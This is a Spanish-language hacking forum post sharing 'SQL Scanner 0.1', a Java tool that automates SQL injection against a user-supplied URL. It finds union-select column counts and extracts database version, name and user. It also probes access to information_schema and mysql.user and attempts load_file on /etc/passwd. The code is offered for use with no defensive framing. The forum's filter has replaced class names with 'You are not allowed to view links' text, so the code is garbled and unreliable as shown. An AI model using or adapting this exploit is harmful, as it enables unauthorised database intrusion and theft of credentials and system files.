comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Java] SQL Scanner 0.1

  • 0 Respuestas
  • 1265 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Enero 12, 2013, 11:44:27 pm »
Un simple Scanner SQLI hecho en Java.

Código: Java
  1. //SQL Scanner 0.1
  2. //Coded By Doddy H
  3.  
  4. import java.util.Scanner;
  5. import java.io.*;
  6. import java.net.*;
  7.  
  8. import java.util.regex.Matcher;
  9. import java.util.regex.Pattern;
  10.  
  11. public class Main {
  12.  
  13.     public static void main(You are not allowed to view links. Register or Login[] args) throws You are not allowed to view links. Register or Login {
  14.  
  15.  
  16.         You are not allowed to view links. Register or Login codex;
  17.         You are not allowed to view links. Register or Login target;
  18.  
  19.         Pattern uno = null;
  20.         Matcher dos = null;
  21.  
  22.         Scanner host = new Scanner(You are not allowed to view links. Register or Login.in);
  23.         You are not allowed to view links. Register or Login.out.println("\n\n-- == SQL Scanner 0.1 == --\n\n");
  24.         You are not allowed to view links. Register or Login.out.println("[+] Page : ");
  25.         target = host.nextLine();
  26.  
  27.         You are not allowed to view links. Register or Login.out.println("\n[+] Checking ...\n");
  28.  
  29.         codex = toma(target + "-1+union+select+666--");
  30.  
  31.         uno = Pattern.compile("The used SELECT statements have a different number of columns");
  32.         dos = uno.matcher(codex);
  33.  
  34.         if (dos.find()) {
  35.             You are not allowed to view links. Register or Login.out.println("[+] Scanning ...\n");
  36.  
  37.             int x;
  38.             You are not allowed to view links. Register or Login urlfinal;
  39.             You are not allowed to view links. Register or Login otrofinal;
  40.             You are not allowed to view links. Register or Login code;
  41.             You are not allowed to view links. Register or Login formariny;
  42.             You are not allowed to view links. Register or Login otroformar;
  43.             You are not allowed to view links. Register or Login link;
  44.  
  45.             urlfinal = "";
  46.             formariny = "";
  47.  
  48.             for (x = 1; x <= 5; x = x + 1) {
  49.  
  50. //urlfinal = urlfinal+x+",";
  51.                 urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
  52.                 formariny = formariny + x + ",";
  53.  
  54.                 otrofinal = urlfinal;
  55.                 otroformar = formariny;
  56.  
  57.                 otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
  58.                 otroformar = otroformar.substring(0, otroformar.length() - 1);
  59.  
  60.                 code = toma(target + "-1+union+select+" + otrofinal);
  61.  
  62.                 uno = Pattern.compile("RATSXPDOWN(\\d+)");
  63.                 dos = uno.matcher(code);
  64.  
  65.                 if (dos.find()) {
  66.  
  67.                     otroformar = otroformar.replace(dos.group(1), "hackman");
  68.  
  69.                     link = target + "-1+union+select+" + otroformar;
  70.  
  71.                     You are not allowed to view links. Register or Login.out.println("[Target] : " + link);
  72.                     You are not allowed to view links. Register or Login.out.println("[Limit] : The site has " + x + " columns");
  73.                     You are not allowed to view links. Register or Login.out.println("[Data] : The number " + dos.group(1) + " print data");
  74.  
  75.                     savefile("logs-scansql.txt", "[Target] : " + link);
  76.                     savefile("logs-scansql.txt", "[Limit] : The site has " + x + " columns");
  77.                     savefile("logs-scansql.txt", "[Data] : The number " + dos.group(1) + " print data");
  78.  
  79.                     You are not allowed to view links. Register or Login.out.println("\n[+] Searching informaion ...\n");
  80.  
  81.                     details(link);
  82.  
  83.                     You are not allowed to view links. Register or Login.out.println("\n[+] Finished");
  84.  
  85.                     You are not allowed to view links. Register or Login.out.println("\n-- == Coded By Doddy H == --");
  86.  
  87.                     savefile("logs-scansql.txt", "\n-----------------\n");
  88.  
  89.                     You are not allowed to view links. Register or Login.exit(1);
  90.  
  91.                 }
  92.  
  93.             }
  94.             You are not allowed to view links. Register or Login.out.println("[-] Error");
  95.         } else {
  96.             You are not allowed to view links. Register or Login.out.println("[-] Not vulnerable");
  97.         }
  98.  
  99.     }
  100.  
  101.     private static void details(You are not allowed to view links. Register or Login urla) throws You are not allowed to view links. Register or Login {
  102.  
  103.         You are not allowed to view links. Register or Login concat;
  104.         You are not allowed to view links. Register or Login code;
  105.  
  106.         Pattern uno = null;
  107.         Matcher dos = null;
  108.  
  109.         concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";
  110.  
  111.         urla = urla.replace("hackman", concat);
  112.  
  113.         code = toma(urla);
  114.  
  115.         uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
  116.         dos = uno.matcher(code);
  117.  
  118.         if (dos.find()) {
  119.             You are not allowed to view links. Register or Login.out.println("[+] DB Version : " + dos.group(1));
  120.             You are not allowed to view links. Register or Login.out.println("[+] DB Name : " + dos.group(2));
  121.             You are not allowed to view links. Register or Login.out.println("[+] Username : " + dos.group(3));
  122.  
  123.             savefile("logs-scansql.txt", "[+] DB Version : " + dos.group(1));
  124.             savefile("logs-scansql.txt", "[+] DB Name : " + dos.group(2));
  125.             savefile("logs-scansql.txt", "[+] Username : " + dos.group(3));
  126.  
  127.         } else {
  128.             You are not allowed to view links. Register or Login.out.println("[-] Not found any data");
  129.         }
  130.  
  131.         urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");
  132.  
  133.         code = toma(urla + "+from+information_schema.tables--");
  134.         uno = Pattern.compile("ERTOR854");
  135.         dos = uno.matcher(code);
  136.  
  137.         if (dos.find()) {
  138.             You are not allowed to view links. Register or Login.out.println("[+] information_schema : on");
  139.             savefile("logs-scansql.txt", "[+] information_schema : on");
  140.         } else {
  141.             You are not allowed to view links. Register or Login.out.println("[-] information_schema : off");
  142.         }
  143.  
  144.         code = toma(urla + "+from+mysql.user--");
  145.         uno = Pattern.compile("ERTOR854");
  146.         dos = uno.matcher(code);
  147.  
  148.         if (dos.find()) {
  149.             You are not allowed to view links. Register or Login.out.println("[+] mysqluser : on");
  150.             savefile("logs-scansql.txt", "[+] mysqluser : on");
  151.         } else {
  152.             You are not allowed to view links. Register or Login.out.println("[-] mysquser : off");
  153.         }
  154.  
  155.         urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");
  156.  
  157. //ystem.out.print(urla);
  158.  
  159.         code = toma(urla);
  160.         uno = Pattern.compile("ERTOR854");
  161.         dos = uno.matcher(code);
  162.  
  163.         if (dos.find()) {
  164.             You are not allowed to view links. Register or Login.out.println("[-] load_file : on");
  165.             savefile("logs-scansql.txt", "[-] load_file : on");
  166.         } else {
  167.             You are not allowed to view links. Register or Login.out.println("[-] load_file : off");
  168.         }
  169.  
  170.     }
  171.  
  172.     private static void savefile(You are not allowed to view links. Register or Login nombre, You are not allowed to view links. Register or Login texto) throws You are not allowed to view links. Register or Login {
  173.  
  174.         You are not allowed to view links. Register or Login writer = new You are not allowed to view links. Register or Login(nombre, true);
  175.         writer.write(texto + "\r\n");
  176.         writer.close();
  177.  
  178.     }
  179.  
  180.     private static You are not allowed to view links. Register or Login toma(You are not allowed to view links. Register or Login urla) throws You are not allowed to view links. Register or Login {
  181.  
  182.         You are not allowed to view links. Register or Login re;
  183.  
  184.         You are not allowed to view links. Register or Login conte = new You are not allowed to view links. Register or Login(40);
  185.  
  186.         You are not allowed to view links. Register or Login url = new You are not allowed to view links. Register or Login(urla);
  187.         You are not allowed to view links. Register or Login hc = url.openConnection();
  188.         hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  189.  
  190.         You are not allowed to view links. Register or Login nave = new You are not allowed to view links. Register or Login(
  191.                 new You are not allowed to view links. Register or Login(hc.getInputStream()));
  192.  
  193.         while ((re = nave.readLine()) != null) {
  194.             conte.append(re);
  195.         }
  196.  
  197.         nave.close();
  198.  
  199.         return conte.toString();
  200.  
  201.     }
  202.  
  203.     public static You are not allowed to view links. Register or Login encodehex(You are not allowed to view links. Register or Login text) {
  204.  
  205. //Thanks to Katarina Majetic
  206. //Based on http://www.dzone.com/snippets/encode-string-hex
  207.  
  208.         byte[] z = text.getBytes();
  209.         You are not allowed to view links. Register or Login h = new You are not allowed to view links. Register or Login();
  210.         You are not allowed to view links. Register or Login l;
  211.         int n;
  212.         int a = z.length;
  213.         int u;
  214.  
  215.         for (n = 0; n < a; n++) {
  216.             u = z[n] & 0x000000FF;
  217.             l = You are not allowed to view links. Register or Login.toHexString(u);
  218.             h.append(l);
  219.         }
  220.         return "0x" + h.toString();
  221.     }
  222. }
  223.  
  224. //The End ?
  225.  

 

¿Te gustó el post? COMPARTILO!



[Video Curso] Iniciacion a Java por DesarrolloWeb y EscuelaIT Mayo 2014

Iniciado por graphixx

Respuestas: 3
Vistas: 1476
Último mensaje Febrero 23, 2015, 10:13:28 am
por Hu3c0
Java Extremo [Video Cursos Completos] [Español] [ISO] 2009

Iniciado por graphixx

Respuestas: 9
Vistas: 4399
Último mensaje Diciembre 04, 2017, 02:36:34 am
por graphixx
[LIBRO] Programación avanzada en Java - Sonia Jaramillo Valbuena

Iniciado por graphixx

Respuestas: 2
Vistas: 2636
Último mensaje Junio 01, 2018, 01:56:36 pm
por eervv
Como compilar programas Java en la consola de comandos de Windows

Iniciado por tar3kw0rm3d

Respuestas: 2
Vistas: 2172
Último mensaje Junio 04, 2013, 02:55:07 pm
por tar3kw0rm3d
[Java] Chat utilizando WebSockets con JavaEE y JavaFx

Iniciado por coke951

Respuestas: 3
Vistas: 2821
Último mensaje Diciembre 23, 2016, 10:23:24 pm
por coke951